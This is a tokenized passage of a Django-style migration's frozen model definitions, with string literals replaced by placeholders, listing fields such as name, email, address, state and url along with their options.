'<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:address>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , 
'<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:state>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:url>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:address>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : 
'<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:state>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , 
{ '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:label>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , 
'<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT:type>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> 
'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:max_length>' : '<STR_LIT:3>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:2>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , 
'<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:4>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:4>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:max_length>' : '<STR_LIT:3>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:2>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , 
<EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( 
'<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:status>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:2>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : 
'<STR_LIT:True>' } ) , <EOL> '<STR_LIT:status>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } 